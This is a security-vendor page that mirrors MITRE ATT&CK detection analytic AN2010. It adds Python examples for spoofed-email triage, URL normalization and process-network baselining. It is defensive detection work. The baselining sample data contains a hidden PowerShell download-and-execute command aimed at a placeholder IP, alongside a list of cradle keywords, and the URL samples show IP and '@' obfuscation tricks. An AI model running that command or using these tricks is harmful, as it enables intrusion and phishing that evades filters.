AN2010: Analytic 2010
Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[1][2] Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can also help detect links leading to known malicious sites.[3]
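The sender fan-out and DKIM/SPF checks described above, as an added Python example (not MITRE's or Glexia's code): it parses constructed mail-gateway records carrying the envelope sender, header From, recipient and the Authentication-Results header, groups them by header-From sender, and reports senders that fail authentication, whose envelope domain does not match the From domain, or that are unknown and reach many mailboxes at once. The allowlist, the fan-out threshold, the record layout and the simplified relaxed-alignment rule are assumptions for the demo.

```python
import re
from collections import defaultdict
from email.utils import parseaddr

# Constructed mail-gateway records for illustration (not real logs). Each carries the
# envelope sender (MAIL FROM), the header From, one recipient, and the Authentication-Results
# header the receiving MTA stamped (RFC 8601 syntax, trimmed to the fields parsed below).
SAMPLE_RECORDS = [
    # Known newsletter: high fan-out but authenticated and aligned, so it should stay quiet.
    *[{"mail_from": "bounce@newsletter.example.org",
       "from": "News <news@newsletter.example.org>", "rcpt": r,
       "auth": "mx.corp.example; spf=pass smtp.mailfrom=newsletter.example.org; "
               "dkim=pass header.d=newsletter.example.org"}
      for r in ("alice@corp.example", "bob@corp.example", "carol@corp.example", "dave@corp.example")],
    # Spoofed internal helpdesk: From claims corp.example, envelope is elsewhere, SPF fails.
    *[{"mail_from": "x9@mailer-7.example.net",
       "from": "IT Helpdesk <helpdesk@corp.example>", "rcpt": r,
       "auth": "mx.corp.example; spf=fail smtp.mailfrom=mailer-7.example.net; dkim=none"}
      for r in ("alice@corp.example", "bob@corp.example", "erin@corp.example")],
    # Unknown sender, authenticated, but reaching many mailboxes at once.
    *[{"mail_from": "promo@unknown-mailer.example",
       "from": "promo@unknown-mailer.example", "rcpt": r,
       "auth": "mx.corp.example; spf=pass smtp.mailfrom=unknown-mailer.example; "
               "dkim=pass header.d=unknown-mailer.example"}
      for r in ("alice@corp.example", "bob@corp.example", "carol@corp.example")],
    # Ordinary one-to-one partner mail: nothing to report.
    {"mail_from": "partner@vendor.example", "from": "partner@vendor.example",
     "rcpt": "alice@corp.example",
     "auth": "mx.corp.example; spf=pass smtp.mailfrom=vendor.example; dkim=pass header.d=vendor.example"},
]

KNOWN_BULK_SENDER_DOMAINS = {"newsletter.example.org"}   # assumed local allowlist
FANOUT_THRESHOLD = 3                                     # distinct recipients per sender (assumed)

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)")
DKIM_D_RE = re.compile(r"header\.d=([\w.-]+)")


def parse_auth_results(value):
    """Return ({'spf': 'pass', 'dkim': ...}, dkim_signing_domain_or_None) from the header value."""
    lowered = value.lower()
    results = {k: v for k, v in AUTH_RE.findall(lowered)}
    m = DKIM_D_RE.search(lowered)
    return results, (m.group(1) if m else None)


def domain_of(addr):
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def aligned(signing_domain, from_domain):
    # Relaxed-alignment approximation: exact match or a subdomain of the signer.
    # A production check would use the public suffix list to find the organizational domain.
    return from_domain == signing_domain or from_domain.endswith("." + signing_domain)


def triage(records, known_bulk=KNOWN_BULK_SENDER_DOMAINS, threshold=FANOUT_THRESHOLD):
    """Group gateway records by header-From sender and return the ones worth an analyst's time."""
    per_sender = defaultdict(lambda: {"rcpts": set(), "reasons": set()})
    for rec in records:
        sender = parseaddr(rec["from"])[1].lower()
        from_dom, env_dom = domain_of(rec["from"]), domain_of(rec["mail_from"])
        entry = per_sender[sender]
        entry["rcpts"].add(rec["rcpt"].lower())
        auth, dkim_d = parse_auth_results(rec["auth"])
        if auth.get("spf") != "pass":
            entry["reasons"].add("spf:" + auth.get("spf", "none"))
        if auth.get("dkim") != "pass":
            entry["reasons"].add("dkim:" + auth.get("dkim", "none"))
        elif dkim_d and not aligned(dkim_d, from_dom):
            entry["reasons"].add("dkim-unaligned:" + dkim_d)
        if env_dom != from_dom:
            entry["reasons"].add("envelope-mismatch:" + env_dom)

    alerts = []
    for sender, entry in per_sender.items():
        fanout = len(entry["rcpts"])
        known = sender.rpartition("@")[2] in known_bulk
        if known and not entry["reasons"]:
            continue                       # allowlisted and fully authenticated: suppress
        if fanout >= threshold and not known:
            entry["reasons"].add(f"fanout:{fanout}")
        if entry["reasons"]:
            alerts.append({"sender": sender, "recipients": fanout,
                           "reasons": sorted(entry["reasons"])})
    alerts.sort(key=lambda a: (-len(a["reasons"]), -a["recipients"]))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(alert)
```

The spoofed helpdesk message surfaces first because it fails on several independent signals (SPF failure, no DKIM, envelope/From mismatch, fan-out), which is the kind of evidence an analyst needs for a spoofing verdict; the authenticated but unknown bulk sender surfaces only on fan-out, so it is a candidate for the allowlist rather than for containment.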
Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor and analyze traffic patterns and packet inspection associated with protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command-line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)).
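The process-to-network baseline and command-line correlation described in this paragraph, as an added Python example (not MITRE's or Glexia's code): a per-host baseline of (process image, destination port) pairs, a classifier that distinguishes pairs this host has seen, pairs only other hosts have seen, and pairs nobody has seen, and a scoring step that raises the priority when the command line of a first-seen network process carries fragments commonly associated with download cradles. The baseline contents, the events, the host names and the suspicious-argument list are constructed assumptions for the demo.

```python
from collections import defaultdict

# Constructed per-host baseline of (process image, destination port) pairs seen during a
# learning window. In practice this is built from EDR or Sysmon network-connection events
# collected over weeks; the literal here only stands in for that history.
BASELINE = {
    "ws-01": {("chrome.exe", 443), ("outlook.exe", 443), ("teams.exe", 443)},
    "ws-02": {("chrome.exe", 443), ("outlook.exe", 443)},
    "srv-01": {("sqlservr.exe", 1433), ("w3wp.exe", 443)},
}

# Constructed connection events, each already joined to the process command line.
EVENTS = [
    {"host": "ws-01", "image": "chrome.exe", "dport": 443, "dst": "203.0.113.10",
     "cmdline": "chrome.exe --profile-directory=Default"},
    {"host": "ws-01", "image": "winword.exe", "dport": 443, "dst": "198.51.100.7",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"host": "ws-02", "image": "teams.exe", "dport": 443, "dst": "203.0.113.20",
     "cmdline": "teams.exe"},
    {"host": "srv-01", "image": "powershell.exe", "dport": 8443, "dst": "198.51.100.9",
     "cmdline": 'powershell.exe -nop -w hidden -c "iex (iwr http://198.51.100.9:8443/s)"'},
]

# Command-line fragments that make a first-seen network process more interesting (assumed list).
SUSPICIOUS_ARGS = ("-encodedcommand", "-enc ", "-nop", "-w hidden", "downloadstring", "iex")


def classify(event, baseline):
    """known: this host has seen the pair; new-on-host: only other hosts have; never-seen: nobody has."""
    key = (event["image"].lower(), event["dport"])
    if key in baseline.get(event["host"], set()):
        return "known"
    if any(key in pairs for pairs in baseline.values()):
        return "new-on-host"
    return "never-seen"


def triage_connections(events, baseline=BASELINE):
    """Return the non-baseline connections with a priority derived from novelty and command line."""
    findings = []
    for ev in events:
        status = classify(ev, baseline)
        if status == "known":
            continue
        flags = [tok for tok in SUSPICIOUS_ARGS if tok in ev["cmdline"].lower()]
        if status == "never-seen":
            level = "high" if flags else "medium"
        else:
            level = "low"               # known elsewhere in the fleet, just not on this host yet
        findings.append({"host": ev["host"], "image": ev["image"], "dst": ev["dst"],
                         "dport": ev["dport"], "status": status, "level": level,
                         "cmdline_flags": flags})
    return findings


def learn(events, baseline=BASELINE):
    """Fold events an analyst judged benign back into the baseline so the pair stops alerting."""
    updated = defaultdict(set, {host: set(pairs) for host, pairs in baseline.items()})
    for ev in events:
        updated[ev["host"]].add((ev["image"].lower(), ev["dport"]))
    return dict(updated)


if __name__ == "__main__":
    for finding in triage_connections(EVENTS):
        print(finding)
```

Keying the baseline on destination port rather than destination address keeps it stable across CDN and cloud IP churn; the address is still carried in the finding so the analyst can pivot to threat intelligence or to the email and URL telemetry for the same destination.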
Furthermore, monitor network traffic for homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). Also monitor and analyze traffic patterns and packet inspection for indicators of cloned websites. For example, if adversaries use HTTrack to clone websites, the string "Mirrored from (victim URL)" may be visible in the HTML section of packets.
Analyst context for executives and security teams
AN2010 is a detection analytic for early warning signs in email, browser, and network activity: unusual senders reaching many accounts, spoofed email headers, suspicious or obfuscated URLs, internationalized-domain homographs, anomalous network flows, and possible cloned-website indicators. For leaders, the value is validating whether the organization can see and triage common pre-compromise signals before users interact with deceptive infrastructure.
Executive priority
Prioritize this analytic as a readiness check for email security, web monitoring, and SOC correlation rather than as a single alert rule. The business question is whether security teams can prove they collect and analyze enough evidence to distinguish normal bulk mail and web access from spoofing, uncategorized or known-bad links, homograph domains, abnormal protocol behavior, and cloned-site artifacts. This supports resilience, incident decision-making, and compliance evidence around preventive and detective controls for inbound messaging and web traffic.
Technical view
The object lists only the PRE platform, so SOC and detection teams should validate coverage across the controls the analytic itself names: email activity analysis; DKIM/SPF and header review; URL inspection with shortened-link expansion and obfuscation handling; browser log review for ASCII and internationalized-domain homographs; and network inspection for uncommon data flows or protocol deviations, including SSL/TLS inspection where it is deployed. Where available and permitted, correlate network patterns with process monitoring and command-line context to identify processes that do not normally initiate network communication. Tune around known legitimate bulk senders, marketing platforms, content delivery patterns, and expected encrypted traffic behavior.
Likely telemetry
- Email gateway or mail security logs showing sender, recipient counts, headers, DKIM/SPF results, and message metadata
- Message trace data identifying many accounts receiving mail from a single unusual or unknown sender
- URL inspection outputs, including expanded shortened links, obfuscated URL parsing, uncategorized site references, and known-bad site matches
- Browser logs or web security logs containing visited domains, including internationalized domain names and homograph-like domains
- Network flow records showing uncommon destinations, unusual process-to-network behavior, or first-seen network communication
Detection direction
- Validate that email detections can identify unusual sender-to-many-recipient patterns without overwhelming analysts with legitimate newsletters or business platforms.
- Confirm DKIM/SPF and header-analysis results are available to analysts and usable for spoofing triage; do not rely on display-name inspection alone.
- Test URL analysis against shortened, obfuscated, uncategorized, known-bad, and internationalized-domain examples to identify parser and normalization blind spots.
- Add review logic for homographs across browser and network telemetry, especially mixed character sets that visually resemble trusted domains.
- Baseline normal network communication by process so first-seen or unusual process-network activity can be triaged with context.
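The URL-analysis test in the third bullet above, as an added Python example (not MITRE's or Glexia's code): it normalizes URLs the way a browser would interpret them before any blocklist or category lookup, so that the decoy text before "@" (the schema abuse the Mandiant reference [3] discusses), percent-encoded hosts, and IPv4 addresses written as a single decimal number, in hex, or in octal octets all resolve to one canonical host. Shortened links are flagged for expansion rather than followed, because expansion needs a sandboxed fetch that is out of scope here. The blocklist, the shortener list and the sample URLs are constructed assumptions.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

KNOWN_BAD_HOSTS = {"198.51.100.7", "evil.example"}                    # assumed local blocklist
SHORTENER_HOSTS = {"bit.ly", "t.co", "tinyurl.com", "short.example"}  # assumed; real lists are longer


def parse_legacy_ipv4(parts):
    """Resolve the 1-4 part decimal/hex/octal IPv4 spellings browsers accept to a dotted quad."""
    nums = []
    for p in parts:
        if p.startswith("0x"):
            nums.append(int(p, 16))
        elif len(p) > 1 and p.startswith("0"):
            nums.append(int(p, 8))
        else:
            nums.append(int(p, 10))
    if not 1 <= len(nums) <= 4:
        raise ValueError("bad part count")
    *head, last = nums                     # the last part fills all remaining bytes
    if any(n > 255 for n in head) or last >= 256 ** (5 - len(nums)):
        raise ValueError("component out of range")
    value = 0
    for n in head:
        value = (value << 8) | n
    value = (value << (8 * (5 - len(nums)))) | last
    return str(ipaddress.IPv4Address(value))


def canonical_host(host):
    """Percent-decode, lowercase and collapse numeric tricks so blocklist matching sees one form."""
    h = unquote(host).lower().rstrip(".")
    try:
        return str(ipaddress.ip_address(h))          # ordinary dotted quad or IPv6 literal
    except ValueError:
        pass
    try:
        return parse_legacy_ipv4(h.split("."))
    except ValueError:
        return h                                      # a name, not an address


def inspect_url(url, known_bad=KNOWN_BAD_HOSTS, shorteners=SHORTENER_HOSTS):
    parts = urlsplit(url.strip())
    raw_host = parts.hostname or ""                   # urlsplit already drops userinfo and port
    host = canonical_host(raw_host)
    flags = []
    if parts.scheme not in ("http", "https"):
        flags.append("scheme:" + parts.scheme)
    if parts.username is not None:
        # Everything before '@' is userinfo the browser discards; it is there only to fool the eye.
        flags.append("userinfo-decoy:" + parts.username)
    if host != raw_host.lower():
        flags.append("host-rewritten:" + raw_host)
    if host in shorteners:
        flags.append("shortener:expand-before-verdict")
    if host in known_bad:
        flags.append("known-bad")
    return {"url": url, "scheme": parts.scheme, "decoy": parts.username, "host": host, "flags": flags}


SAMPLE_URLS = [                                       # constructed, not taken from real mail
    "https://mail.corp.example/login",
    "https://mail.corp.example@198.51.100.7/login",   # '@' decoy: the real host is the IP
    "http://3325256711/x",                            # 198.51.100.7 as one decimal number
    "http://0xc6336407/x",                            # the same address in hex
    "http://0306.063.0144.07/x",                      # the same address in octal octets
    "http://%65vil.example/path",                     # percent-encoded host
    "https://short.example/a1b2",                     # shortener: expand before deciding
]


def review_urls(urls=SAMPLE_URLS):
    """Return the inspection results that carry at least one flag."""
    return [r for r in map(inspect_url, urls) if r["flags"]]


if __name__ == "__main__":
    for result in review_urls():
        print(result["host"], result["flags"])
```

Running the blocklist against the canonical host rather than the raw string is what closes the blind spot the bullet warns about: all four spellings of 198.51.100.7 above match the same entry, and the decoy URL is attributed to the IP, not to the trusted name that appears first in the address bar.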
Mitigation priorities
- Start by ensuring email authentication and anti-spoofing controls are configured and producing reviewable evidence, especially DKIM/SPF and header-analysis outcomes.
- Strengthen mail and web inspection workflows for shortened links, obfuscated URLs, uncategorized domains, known-bad sites, and internationalized-domain handling.
- Maintain allowlists and baselines for known legitimate bulk senders and expected business web traffic to improve alert quality.
- Enable practical correlation between email, browser/web, network, process, and command-line telemetry for incident response handoff.
- Define escalation criteria for suspicious sender campaigns, homograph domains, cloned-site indicators, and anomalous protocol behavior so SOC teams know when to contain, block, or investigate further.
Analyst notes and limits
This object is an ATT&CK detection analytic, not a technique or adversary behavior description. Its value is strongest as a cross-control validation pattern spanning email security, URL analysis, browser/web logs, network inspection, and endpoint/process context. The external references support anti-spoofing, spoofed email mitigation, and URL obfuscation considerations.
No official detection field, tactics, labels, aliases, or relationship context were supplied. The object lists platform PRE only. Local environment baselines, approved bulk senders, inspection capabilities, privacy constraints, and available telemetry determine whether this analytic can be implemented effectively.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 82e525c2766c… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Microsoft Anti Spoofing: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.
- [2] ACSC Email Spoofing: Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024.
- [3] Mandiant URL Obfuscation 2023: Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.
- [4] mitre-attack AN2010: MITRE ATT&CK source record for AN2010.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.